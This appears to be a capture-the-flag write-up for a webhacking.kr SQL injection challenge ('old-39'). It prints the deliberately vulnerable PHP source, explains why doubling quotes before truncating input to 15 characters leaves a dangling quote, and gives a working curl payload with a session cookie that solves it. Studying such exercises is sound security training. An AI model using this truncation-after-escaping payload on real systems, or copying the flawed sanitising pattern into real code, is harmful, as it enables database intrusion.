old-39 -- SQLi (Length)

URL: https://webhacking.kr/challenge/bonus-10/?view_source=1

<?php
  $db = dbconnect();
  if($_POST['id']){
    $_POST['id'] = str_replace("\\","",$_POST['id']);
    $_POST['id'] = str_replace("'","''",$_POST['id']);
    $_POST['id'] = substr($_POST['id'],0,15);
    $result = mysqli_fetch_array(mysqli_query($db,"select 1 from member where length(id)<14 and id='{$_POST['id']}"));
    if($result[0] == 1){
      solve(39);
    }
  }
?>

To win we have to get valid SQL query.

id starts with quote ('), but never ends.
Quote in string gets replaced by 2 quotes.
Slash character is not allowed
String length is limited to 15
String is cut of after replace

Payload: 1 ' (id + padding + closing_quote)

curl 'https://webhacking.kr/challenge/bonus-10/index.php' \
  -H 'Cookie: PHPSESSID=3052403292' \
  -d 'id=1+++++++++++++%27'

Previousold-38 -- SQLi (Newline)Nextold-40 -- SQLi (Blind)

Last updated 7 months ago